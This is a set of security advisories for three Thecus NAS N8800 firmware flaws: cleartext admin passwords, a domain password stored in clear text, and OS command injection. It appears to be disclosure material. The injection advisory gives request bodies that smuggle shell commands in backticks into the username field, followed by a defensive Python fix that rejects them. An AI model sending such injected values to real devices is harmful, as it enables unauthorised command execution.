CVE-2013-5669 Thecus Plain Text Admin Password

Advisory Information

Title: Thecus NAS Server N8800 Firmware 5.03.01 plain text administrative password
Date published: August 2013
Ref: CVE-2013-5669 CWE-319

Advisory Summary

The Network Attached Storage (NAS) Administration Web Page for Thecus NAS Server N8800 transmits passwords in cleartext, which allows remote attackers to sniff the administrative password.

Vendor

Thecus

Affected Software

NAS Server N8800 Firmware 5.03.01

Description of Issue

The Thecus NAS Server N8800 sends NAS administrative authentication credentials in plaintext across the network. The credentials may be disclosed to attackers with the ability to intercept network traffic, which may enable them to gain unauthorised access to the NAS administrative interface.

PoC

There is no exploit code required.

CVE-2013-5668 Thecus Domain Administrator Password Disclosure

Advisory Information

Title: Thecus NAS Server N8800 Firmware 5.03.01
Date published: August 2013
Ref: CVE-2013-5668 CWE-317

Advisory Summary

The Domain Administrator Password within the ADS/NT Support page is disclosed due to clear text storage of sensitive information within the GUI.

Vendor

Thecus

Affected Software

NAS Server N8800 Firmware 5.03.01

Description of Issue

The Domain Administrator Password within the ADS/NT Support page is disclosed due to clear text storage of sensitive information within the GUI. Any user who has access to this page is able to retrieve the ADS/NT administrator ID and password. This could enable an attacker to gain access to the domain hosting the storage server.

PoC

Attackers can use a browser to exploit this issue.

CVE-2013-5667 Thecus OS Command Injection

Advisory Information

Title: Thecus NAS Server N8800 Firmware 5.03.01 get_userid OS Command Injection
Date published: August 2013
Ref: CVE-2013-5667 CWE-78

Advisory Summary

A lack of input validation allows an attacker to execute OS commands directly on the operating system.

Vendor

Thecus

Affected Software

NAS Server N8800 Firmware 5.03.01

Description of Issue

The application accepts user input through the get_userid parameter that can be used to create OS commands that are redirected to the operating system. An attacker can use this flaw to execute arbitrary commands.

PoC

Standard request:

get_userid=1&username=admin

Response:

{"get_userid":"1001","groupname":false,"data":[]}

Command Injection PoC:

1. Write value for user admin to /tmp

get_userid=1&username=admin`echo+admin+>+/tmp/xpto`

2. Display value of /tmp

get_userid=1&username=`cat+/tmp/xpto`

Response:

{"get_userid":"1001","groupname":false,"data":[]}
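The missing input validation described above can be closed by checking the username against an allow-list and resolving it without a shell. The following is an added example, not Thecus firmware code and not part of the original advisory; the handler name, the allow-list pattern and the error messages are assumptions.

```python
import json
import pwd
import re
from urllib.parse import parse_qs

# Assumption: account names fit this conservative allow-list
# (letters, digits, "_", ".", "-", at most 32 characters).
USERNAME_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_.-]{0,31}")


def handle_get_userid(body, lookup=pwd.getpwnam):
    """Answer a get_userid request without ever building a shell command line.

    `body` is the form-encoded request body. `lookup` maps a name to a passwd
    entry; the default is the C library lookup, so no process is spawned.
    """
    params = parse_qs(body, keep_blank_values=True)
    names = params.get("username", [])
    # Exactly one username, and it must match the allow-list in full.
    if len(names) != 1 or not USERNAME_RE.fullmatch(names[0]):
        return json.dumps({"error": "invalid username"})
    try:
        uid = lookup(names[0]).pw_uid
    except KeyError:
        return json.dumps({"error": "unknown user"})
    # Same field layout as the response quoted in the advisory.
    return json.dumps({"get_userid": str(uid), "groupname": False, "data": []})


# Sample input: the three request bodies quoted in the advisory.
SAMPLES = [
    "get_userid=1&username=admin",
    "get_userid=1&username=admin`echo+admin+>+/tmp/xpto`",
    "get_userid=1&username=`cat+/tmp/xpto`",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(body, "->", handle_get_userid(body))
```

Both PoC bodies are rejected before any lookup happens, because the backticks, spaces and ">" fall outside the allow-list.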